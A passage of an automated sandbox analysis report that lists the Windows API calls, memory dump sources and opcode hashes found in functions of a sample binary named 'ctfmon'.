        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: FromMonitorWindow
        • String ID:
        • API String ID: 721739931-0
        • Opcode ID: 0ba1fc86d451cd674b8620c5ae4f720fa838888ad4e6d9ad1c3c2af6160355b6
        • Instruction ID: 27bb940a1f3bd50fed2c6d6a608dacda6c6e613f901876cb4841b3324aa04d70
        • Opcode Fuzzy Hash: 0ba1fc86d451cd674b8620c5ae4f720fa838888ad4e6d9ad1c3c2af6160355b6
        • Instruction Fuzzy Hash: C4F03131204609ABDF119F61CC499AF3BB8EF00344B548436FC15F51A0DB78EA55DF59
        APIs
          • Part of subcall function 0041257D: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,0041400E,00000009,00000000,00000000,00000001,00410234,00000001,00000074,?,?,00000000,00000001), ref: 004125BA
          • Part of subcall function 0041257D: EnterCriticalSection.KERNEL32(?,?,?,0041400E,00000009,00000000,00000000,00000001,00410234,00000001,00000074,?,?,00000000,00000001), ref: 004125D5
          • Part of subcall function 004125DE: LeaveCriticalSection.KERNEL32(?,0040E217,00000009,0040E203,00000000,?,00000000,00000000,00000000), ref: 004125EB
        • GetTimeZoneInformation.KERNEL32(0000000C,00000000,0000000C,?,0000000B,0000000B,?,00414AD9,0040F5F7,00000000,?,?,0040F46A,00000000,00000001), ref: 00414B36
        • WideCharToMultiByte.KERNEL32(00000220,0053F9C4,000000FF,0000003F,00000000,00000000,?,0000000B,0000000B,?,00414AD9,0040F5F7,00000000,?,?,0040F46A), ref: 00414BCC
        • WideCharToMultiByte.KERNEL32(00000220,0053FA18,000000FF,0000003F,00000000,00000000,?,0000000B,0000000B,?,00414AD9,0040F5F7,00000000,?,?,0040F46A), ref: 00414C05
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: CriticalSection$ByteCharMultiWide$EnterInformationInitializeLeaveTimeZone
        • String ID:
        • API String ID: 3442286286-0
        • Opcode ID: aac624340af3ebf17a977342e7469023fb5b1538da0d99a694fe3e54f7e6ed47
        • Instruction ID: 48f4ca70aef0641f6a7985dd11d64af3c1749ff9a8629de9f8af13e7c0a6b540
        • Opcode Fuzzy Hash: aac624340af3ebf17a977342e7469023fb5b1538da0d99a694fe3e54f7e6ed47
        • Instruction Fuzzy Hash: F961F571904150AFDB219F29EC42BE63BA5E782314F24513FE284973E1D7B849C29B9D
        APIs
        • GetKeyState.USER32(00000010), ref: 004207A9
        • GetKeyState.USER32(00000011), ref: 004207B2
        • GetKeyState.USER32(00000012), ref: 004207BB
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: State
        • String ID:
        • API String ID: 1649606143-0
        • Opcode ID: 2f6419a2dddfb4d1a28dc0e12c4fc165ddb708ff50ba0677f42bd9c75a4199f1
        • Instruction ID: f4ac4529b9722813b7d67fd19f5cdbe002d1c3b3255552e6b50f59c26b2fec3d
        • Opcode Fuzzy Hash: 2f6419a2dddfb4d1a28dc0e12c4fc165ddb708ff50ba0677f42bd9c75a4199f1
        • Instruction Fuzzy Hash: E0E06535702269DDEA505250AD44FA567D05F80F94F808497E684AB097CAB8B842DF69
        APIs
        • SetUnhandledExceptionFilter.KERNEL32(Function_000140B0), ref: 004140FB
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: ExceptionFilterUnhandled
        • String ID:
        • API String ID: 3192549508-0
        • Opcode ID: 366c4fb960b85c2e92b2bea7ad6ad634cd9710ba745c8f2d91dedbc209867883
        • Instruction ID: f1ff27b7916b2cce631cc1a557f075b00fa1526ff6cad74bdb84531a931c4cae
        • Opcode Fuzzy Hash: 366c4fb960b85c2e92b2bea7ad6ad634cd9710ba745c8f2d91dedbc209867883
        • Instruction Fuzzy Hash: A8A022FAA8A2008B83208F20BC0A3083EA0B2883023008033E80080330CB300000AF2E
        APIs
        • SetUnhandledExceptionFilter.KERNEL32 ref: 0041410D
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: ExceptionFilterUnhandled
        • String ID:
        • API String ID: 3192549508-0
        • Opcode ID: c081741ae02d8cb9fc3fe6e60ab96c73a027c458e2d34c0bfccc6886e0d337f1
        • Instruction ID: dd4f498f1e2aac16624c323be649f155b6b708a99a262030bc333f91d3ecbafa
        • Opcode Fuzzy Hash: c081741ae02d8cb9fc3fe6e60ab96c73a027c458e2d34c0bfccc6886e0d337f1
        • Instruction Fuzzy Hash:
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: b6d2d708561d6972fe9b309b4addc8bbea1b0bac5f5c1817c0a3542f0aa82c15
        • Instruction ID: db3412e87bc0fbacba2cc52aabc5694b2b7dc5964e815c9b5da4f2738e772d69
        • Opcode Fuzzy Hash: b6d2d708561d6972fe9b309b4addc8bbea1b0bac5f5c1817c0a3542f0aa82c15
        • Instruction Fuzzy Hash: D9625F74600B018FD734CF19D990AA7B7E2EF95710B144A2EE88687B51DB34FC86CB65
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: c324fae35605e0318178e989c7bf8fd9c7c74e6d59fe310db041826096156942
        • Instruction ID: a6df442306ba8a4dfabb8f5a196b79691c35f75c2b15b1fc05cb6d8271a1422f
        • Opcode Fuzzy Hash: c324fae35605e0318178e989c7bf8fd9c7c74e6d59fe310db041826096156942
        • Instruction Fuzzy Hash: 63F1A0765092408FC309CF18D4989E2BBE6EF98714F1F82FEC4599B362D3369981CB95
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 5f69cb2e3e429f83e438e39c9d8bf7617ce01c0b10c237f74658f4d2a52fb2f6
        • Instruction ID: 69cc6d32e20112f50dc792a520a733575006adad840aea48e66f089e357589c8
        • Opcode Fuzzy Hash: 5f69cb2e3e429f83e438e39c9d8bf7617ce01c0b10c237f74658f4d2a52fb2f6
        • Instruction Fuzzy Hash: F8E12675600B018FD329CF29C990AA7B7E2BF89304B58892ED9D787B51D735F882CB45
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 6bb64c443ab7e783f8eea725965ac47a0914f086a44cb6f0de9022562112617b
        • Instruction ID: d36bd19848220be26b27225da97ef841b32e4fcccd14377bcdabf79b971b2156
        • Opcode Fuzzy Hash: 6bb64c443ab7e783f8eea725965ac47a0914f086a44cb6f0de9022562112617b
        • Instruction Fuzzy Hash: 8AB13976214B418FC328DF29C9A09A7B3E2BF89304B18892ED597C7B51D735F881CB49
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 15325b2f067a5f149b17b86ebc0ca50656abf31d02fd38b4e25d355ebc85a566
        • Instruction ID: 7796cbec15bd05dc3979ce63851c4ecb7f4ba1e90501db5deab1b6de846e4272
        • Opcode Fuzzy Hash: 15325b2f067a5f149b17b86ebc0ca50656abf31d02fd38b4e25d355ebc85a566
        • Instruction Fuzzy Hash: FED178756092518FC319CF18D4D88E27BE5EF98700B1E82FDC9898B323D7319981CB99
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
        • Instruction ID: ed1c1f8a0473429884b12b6c18174f26900eaea0c8f50ff17363cd7a291bb6b7
        • Opcode Fuzzy Hash: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
        • Instruction Fuzzy Hash: 54B17FB590020ADFDB15CF04C5D0AE9BBA1BF58319F14C1AED85A5B382C735EE86CB94
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: dca000b2f6927503bda9435cdfa2d38ec8c2434b44ad82a88198043659fe7c76
        • Instruction ID: bfb1cc0ea4169eae0f8b60db0e39e4e80a134d46bfd7a75976ba22cab59c3b7f
        • Opcode Fuzzy Hash: dca000b2f6927503bda9435cdfa2d38ec8c2434b44ad82a88198043659fe7c76
        • Instruction Fuzzy Hash: D2715033755A8207EB2DCE3E8C602FBABD34FC522472EC87E94DAC7756EC6994165204
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 04f210bc631fba5b5fd9519e44931367e58250411bf8a2553d7fdef40e8ac27b
        • Instruction ID: 2e254a85d347c2b5898950b2ed43d9309ce3c2e276b75ff7e572e5608014be0a
        • Opcode Fuzzy Hash: 04f210bc631fba5b5fd9519e44931367e58250411bf8a2553d7fdef40e8ac27b
        • Instruction Fuzzy Hash: F1813E327142424BDB58CF29ECE152FB793EB9D300B19AA3DD649C7356C934E815CB98
        APIs
        • GetWindowLongA.USER32(?,000000F0), ref: 0041E394
        • GetParent.USER32(?), ref: 0041E3AD
        • SetBkMode.GDI32(?,00000002), ref: 0041E3BD
        • GetClientRect.USER32(?,?), ref: 0041E3CF
        • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 0041E3F7
        • SelectObject.GDI32(?,00000000), ref: 0041E407
          • Part of subcall function 0041E040: InflateRect.USER32(?,000000FF,000000FF), ref: 0041E082
          • Part of subcall function 0041E040: IsWindowEnabled.USER32(?), ref: 0041E095
          • Part of subcall function 0041E040: InflateRect.USER32(?,000000FF,000000FF), ref: 0041E0BC
          • Part of subcall function 0041E040: PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 0041E0D3
          • Part of subcall function 0041E040: PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 0041E0EC
          • Part of subcall function 0041E040: PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 0041E104
          • Part of subcall function 0041E040: PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 0041E11E
          • Part of subcall function 0041E040: SelectObject.GDI32(?,?), ref: 0041E143
        • GetSysColor.USER32(0000000F), ref: 0041E419
        • SetBkColor.GDI32(?,00000000), ref: 0041E41D
        • GetSysColor.USER32(00000012), ref: 0041E425
        • SetTextColor.GDI32(?,00000000), ref: 0041E429
        • SendMessageA.USER32(?,00000135,?,?), ref: 0041E43B
        • SelectObject.GDI32(?,00000000), ref: 0041E443
        • IntersectClipRect.GDI32(?,?,?,?,?), ref: 0041E468
        • PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 0041E4A0
        • IsWindowEnabled.USER32(?), ref: 0041E4A7
        • SendMessageA.USER32(?,000000F2,00000000,00000000), ref: 0041E4BB
        • GetWindowTextA.USER32(?,?,00000100), ref: 0041E529
        • SelectObject.GDI32(?,?), ref: 0041E87F
        • SelectObject.GDI32(?,00000000), ref: 0041E892
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: ObjectSelect$ColorRectWindow$MessageSend$EnabledInflateText$ClientClipIntersectLongModeParent
        • String ID:
        • API String ID: 2549663215-0
        • Opcode ID: 3fd3a575849ad3d1436d3d32659979540c585af791503cc77f23874067242d08
        • Instruction ID: 6799aca15d36f123e668f58c1c135d1dd851374628879934b92dffa4031545d3
        • Opcode Fuzzy Hash: 3fd3a575849ad3d1436d3d32659979540c585af791503cc77f23874067242d08
        • Instruction Fuzzy Hash: D2F12875604301AFD310DF68CC85EAFB7E8FB88704F44492DFA8586250E7B9E945CB5A
        APIs
        • GetWindowLongA.USER32(?,000000F0), ref: 0041EBBE
        • SendMessageA.USER32(?,00000157,00000000,00000000), ref: 0041EBEA
        • HideCaret.USER32(?), ref: 0041EC00
        • GetWindowRect.USER32(?,?), ref: 0041EC0C
        • GetParent.USER32(?), ref: 0041EC13
        • ScreenToClient.USER32(00000000,?), ref: 0041EC27
        • ScreenToClient.USER32(00000000,?), ref: 0041EC33
        • GetDC.USER32(00000000), ref: 0041EC36
        • GetWindowLongA.USER32(?,000000F4), ref: 0041EC68
        • SendMessageA.USER32(00000000,00001944,00000000,0000029A), ref: 0041EC95
        • SendMessageA.USER32(00000000,00001943,00000000,0000029A), ref: 0041ECB6
        • GetClassNameA.USER32(00000000,?,00000010), ref: 0041ECC8
        • lstrcmpA.KERNEL32(?,ComboBox), ref: 0041ECD8
        • GetParent.USER32(00000000), ref: 0041ECFC
        • MapWindowPoints.USER32(00000000,0000029A,?,00000002), ref: 0041ED13
        • ReleaseDC.USER32(00000000,00000000), ref: 0041ED1B
        • GetDC.USER32(?), ref: 0041ED26
        • GetWindowLongA.USER32(00000000,000000F0), ref: 0041ED3C
        • GetWindow.USER32(00000000,00000005), ref: 0041ED57
        • GetWindowRect.USER32(00000000,?), ref: 0041ED63
        • SendMessageA.USER32(00000000,00000157,00000000,00000000), ref: 0041EDA0
        • ReleaseDC.USER32(?,00000000), ref: 0041EDB0
        • ShowCaret.USER32(?), ref: 0041EDB7
        • GetSystemMetrics.USER32(00000002), ref: 0041EDF8
        • GetSystemMetrics.USER32(00000002), ref: 0041EE57
        • GetSystemMetrics.USER32(00000015), ref: 0041EEA8
        • ReleaseDC.USER32(00000000,00000000), ref: 0041EECA
        • ShowCaret.USER32(?), ref: 0041EED8
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Window$MessageSend$CaretLongMetricsReleaseSystem$ClientParentRectScreenShow$ClassHideNamePointslstrcmp
        • String ID: ComboBox
        • API String ID: 930961256-1152790111
        • Opcode ID: 095c6ff481106a7ff09be76659a5ce7917ff468ea38e97da75e3ba20c683b7f8
        • Instruction ID: e5c296bea3933cf44f53e168aaf778f0ec2db8dd84e81f58de9af8b4068f9cfc
        • Opcode Fuzzy Hash: 095c6ff481106a7ff09be76659a5ce7917ff468ea38e97da75e3ba20c683b7f8
        • Instruction Fuzzy Hash: C391B571608301AFD320DB25DC89FBF77A8FB85744F40092DFA4196291D778E946CB5A
        APIs
        • EnterCriticalSection.KERNEL32(00540EE0,?,?,?,?,?,?,?,?,?,?,?,?,0041C837), ref: 0041D2CB
        • GetDC.USER32(00000000), ref: 0041D2D3
        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0041D2E4
        • GetDeviceCaps.GDI32(00000000,0000000E), ref: 0041D2EB
        • GetSystemMetrics.USER32(00000001), ref: 0041D309
        • GetSystemMetrics.USER32(00000000), ref: 0041D314
        • ReleaseDC.USER32(00000000,00000000), ref: 0041D32A
        • GlobalAddAtomA.KERNEL32(C3d), ref: 0041D344
        • LeaveCriticalSection.KERNEL32(00540EE0,?,?,?,?,?,?,?,?,?,?,?,?,0041C837), ref: 0041D360
        • GlobalAddAtomA.KERNEL32(C3dNew), ref: 0041D377
        • GlobalAddAtomA.KERNEL32(C3dL), ref: 0041D389
        • GlobalAddAtomA.KERNEL32(C3dH), ref: 0041D396
        • GlobalAddAtomA.KERNEL32(C3dLNew), ref: 0041D3BA
        • GlobalAddAtomA.KERNEL32(C3dHNew), ref: 0041D3C7
        • GlobalAddAtomA.KERNEL32(C3dD), ref: 0041D3EB
        • GetSystemMetrics.USER32(0000002A), ref: 0041D3FE
        • GetClassInfoA.USER32(00000000,004326E8,?), ref: 0041D441
        • GetClassInfoA.USER32(00000000,00008002,?), ref: 0041D45E
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: AtomGlobal$MetricsSystem$CapsClassCriticalDeviceInfoSection$EnterLeaveRelease
        • String ID: C3d$C3dD$C3dH$C3dHNew$C3dL$C3dLNew$C3dNew
        • API String ID: 1233821986-3277416593
        • Opcode ID: 8c3cc1726dc5f5e07f9ce3bacf8b38420d8711e0c0a32e7e01f5753ca4cfe4ff
        • Instruction ID: e50427c789af92de44b22dfa043ad602546bc15970a851fe98efa0f61ee8e012
        • Opcode Fuzzy Hash: 8c3cc1726dc5f5e07f9ce3bacf8b38420d8711e0c0a32e7e01f5753ca4cfe4ff
        • Instruction Fuzzy Hash: A2410FB8A403047AD720AB54DC817EE37A4BF59358F546037DD00972D0D7BC988D9BAA
        APIs
        • RegisterClipboardFormatW.USER32(Native), ref: 004293C3
        • RegisterClipboardFormatW.USER32(OwnerLink), ref: 004293CC
        • RegisterClipboardFormatW.USER32(ObjectLink), ref: 004293D6
        • RegisterClipboardFormatW.USER32(Embedded Object), ref: 004293E0
        • RegisterClipboardFormatW.USER32(Embed Source), ref: 004293EA
        • RegisterClipboardFormatW.USER32(Link Source), ref: 004293F4
        • RegisterClipboardFormatW.USER32(Object Descriptor), ref: 004293FE
        • RegisterClipboardFormatW.USER32(Link Source Descriptor), ref: 00429408
        • RegisterClipboardFormatW.USER32(FileName), ref: 00429412
        • RegisterClipboardFormatW.USER32(FileNameW), ref: 0042941C
        • RegisterClipboardFormatW.USER32(Rich Text Format), ref: 00429426
        • RegisterClipboardFormatW.USER32(RichEdit Text and Objects), ref: 00429430
        Strings
